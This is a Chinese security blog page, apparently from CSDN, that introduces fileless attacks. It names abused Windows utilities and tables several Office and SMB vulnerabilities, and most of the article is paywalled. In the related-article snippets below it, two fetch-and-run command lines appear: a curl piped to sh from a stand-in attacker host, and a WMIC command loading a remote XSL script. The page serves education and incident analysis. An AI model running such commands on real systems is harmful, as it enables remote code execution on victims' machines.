无文件攻击的种类

最新推荐文章于 2023-11-10 15:29:57 发布
最新推荐文章于 2023-11-10 15:29:57 发布
阅读量2k 收藏 4
点赞数 3
分类专栏: Windows病毒分析 Windows逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43312649/article/details/110387172
版权
无文件攻击旨在避开传统安全软件,不留下磁盘上的恶意文件痕迹。常见利用工具包括certutil.exe、AutoIT、mshta.exe、bitsadmin、schtasks.exe、rundll32.exe、sc.exe、regsvr32.exe、Wmic.exe等,通过这些工具进行恶意代码的下载、执行和隐藏。攻击者还利用协议漏洞、Office漏洞以及计划任务等方式实施攻击。
摘要由CSDN通过智能技术生成

在安全领域,无文件攻击意味着极其严重的威胁。“无文件”一词,是在探讨绕过恶意文件检测技术的方法时诞生的术语。“无文件攻击”只是一种攻击策略,其出发点就是避免将恶意文件放在磁盘上,以逃避传统安全软件的检测。
本知识领域牵涉到病毒逆向分析和渗透测试两大版块。

无文件攻击的种类

在这里插入图片描述
近些年来比较出名的协议漏洞以及Office漏洞:

病毒名称 漏洞类型 CVE编号 漏洞位置
Office漏洞 CVE-2017-0199 内嵌OLE2LINK对象
Office漏洞 CVE-2017-11882(噩梦公式一代) 公式编辑器EQNEDT32.EXE
Office漏洞 CVE-2018-0802(噩梦公式二代) 公式编辑器EQNEDT32.EXE
WannaCry SMB漏洞 ms17-010 Windows操作系统4
了解本专栏 订阅专栏 解锁全文 超级会员免费看
摔不死的笨鸟
关注
专栏目录
订阅专栏
基于MBR的无文件攻击技术
不忘初心,护天下安全!
06-01 433
启动记录是磁盘或卷的第一个扇区,并且包含启动操作系统启动过程所需的可执行代码。 如将 Bootya 等威胁覆盖到恶意代码,可以感染启动记录。 当计算机启动时,恶意软件将立即获得控制权。 启动记录驻留在文件系统外部,但操作系统可以访问它。MBR是在BIOS完成硬件初始化后首次加载的磁盘部分。它是引导加载程序的位置。对启动驱动器具有原始访问权限的对手可能会覆盖此区域,从而将启动期间的执行从正常启动加载程序转移到对手代码。试想,若病毒隐藏恶意代码于在MBR中,就可以实现先于系统加载,绕过杀软的效果。硬盘的逻辑结构
浅谈无文件攻击
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
12-03 526
这些年无文件(Fileless)和不落地(Living off the Land)攻击已经非常流行,几乎成为攻击者的标配。理想的无文件攻击是只存在于内存中的后门,网络上有很多无文件攻击的验证性代码,比如最早的powershell downloadstring,远程文件是被当成字符串直接下载到powershell进程内存中执行,然后发展到利用mshta、rundll32等执行脚本的各种奇技淫巧,再到现在流行的各种.NET assembly托管代码注入技术,当然还有一些完全脱离操作系统的高端无文件攻击。而微软有
文件攻击
why123wh的博客
02-16 2597
文件攻击是一种高级持续性威胁(APT)的攻击方式,它不会在目标系统的磁盘上留下可执行文件,而是利用系统内置的工具或脚本执行恶意代码,从而绕过传统的安全防护措施。无文件攻击的最大特点就是恶意代码直接在内存中运行,难以被发现和清除。
文件攻击的各种姿势
蚁景网安学院
05-08 936
0x01很多应急响应行动中都会出现这样的场景:客户主机出现CPU占用率很高或有连接C&C服务器的可疑现象,但是使用杀软查杀却没有发现磁盘上有恶意文件。这其实就是无文件攻击。“无文...
浅谈无文件落地攻击
errorr0
06-04 2375
文件落地攻击实现隐藏攻击
MSFVenom无文件攻击的探索与应用
文件攻击简介 ## 1.1 什么是无文件攻击 在信息安全领域,无文件攻击是一种利用系统中已存在的合法进程或服务,通过内存注入等技术实现攻击操作,而无需在目标系统上留下磁盘文件攻击方式。这种形式的攻击对于...
流量分析 ICC 2019Dos攻击数据集 文件格式txt,csv
03-24
接下来,可以利用机器学习算法,如支持向量机(SVM)、随机森林或集成学习方法,甚至是深度神经网络,训练分类模型来区分正常流量和DoS攻击流量。对于深度学习,可能涉及卷积神经网络(CNN)或循环神经网络(RNN),...
常见的无文件攻击技术解析(不定时更新)——入得此门不回首
sxr__nc的博客
05-18 830
下边介绍的几种无文件攻击方式都是在病毒分析过程中实际碰到过的技术手段,有解释的不清楚或者有粗无的地方,欢迎一起讨论。 1、通过宏代码的方式来执行恶意操作。之前分析的一个病毒,将代码内嵌到宏代码里边并且设置为自动执行,当用户点击同意启用宏之后(大多通过邮件或者其他社会工程学的方式使用),就会执行宏代码,而宏代码的功能是连接到远程的网站上执行一段恶意的powershell,当然,这段恶意的powershell也是经过混淆的,powershell的功能也是连接到其他网站来执行一段恶意的代码,就这样循环下去,一直
Mykings僵尸网络更新基础设施,大量使用PowerShell脚本进行“无文件攻击挖矿
systemino的博客
05-21 1856
一、概述 MyKings僵尸网络2017 年 2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括 DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络的主要更新点: 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件”落地攻击; 3.在清理竞争对手
利用WinRM实现内网无文件落地攻击
UKK
06-18 872
利用WinRM实现内网无文件落地攻击 http://www.ifind.cc/view/220
linux无文件渗透执行elf
whatday的专栏
08-13 1287
01—简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢?最近看了一篇@MagisterQuis写的文章h...
Linux无文件木马程序渗透测试复现
永远是少年
06-15 1176
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux无文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
样本分析报告——RevengeRAT无文件落地攻击
摔不死的笨鸟的博客
11-17 917
该样本出现在2019年9月6日,样本分析报告在2019年9月16日。样本来源于国外沙箱app.any.run。 样本信息 FileName FileType FileSize MD5 Order____679873892.xls RevengeRAT变种 41,472 bytes 7641fef8abc7cb24b66655d11ef3daf2 样本行为 样本启动后会有启动宏功能的安全提示。 启用宏之后,提示运行时错误,提示标题为Microsoft Visual Basic,由此可以
一次红蓝对抗无文件攻击溯源
Sven的忘却日记
04-01 3080
0)简述 前段时间参加公司举行红蓝对抗演习,帮助蓝军分析并溯源样本。 拿到样本时,就一个xsl类型的文件,和一个用来执行该样本的命令行,如下所示: C:/Windows/SysWOW64/wbem/WMIC.exe os get /format:"//ip/scripts/1.xsl" 可以看出,是通过白利用技术,通过wmic来执行的这个恶意的xsl文件,想了解更多,可以参考这篇文章《wmic调...
文件落地攻击
最新发布
Fly_鹏程万里
11-10 1193
所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。
certutil证书管理命令
啊渊的专栏
09-23 5306
certutil是Linux系统中的一个命令行工具,用于管理和操作证书和密钥。它可以用于安全套接字层(SSL/TLS)证书的导入、导出、查看和删除。certutil还可以用于创建新的证书数据库和密钥库。这个工具在Linux系统中广泛用于网络安全和加密操作,提供了方便的命令行接口来处理证书和密钥。
ASP无组件实现多文件上传教程
`groupID`和`albumID`可能是用来记录文件所属的分类或相册ID。 在实际应用中,还需要添加错误处理机制,比如当文件上传失败或数据库操作出错时的异常处理。同时,为了增强安全性,可以考虑使用更严格的文件类型检查...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

摔不死的笨鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值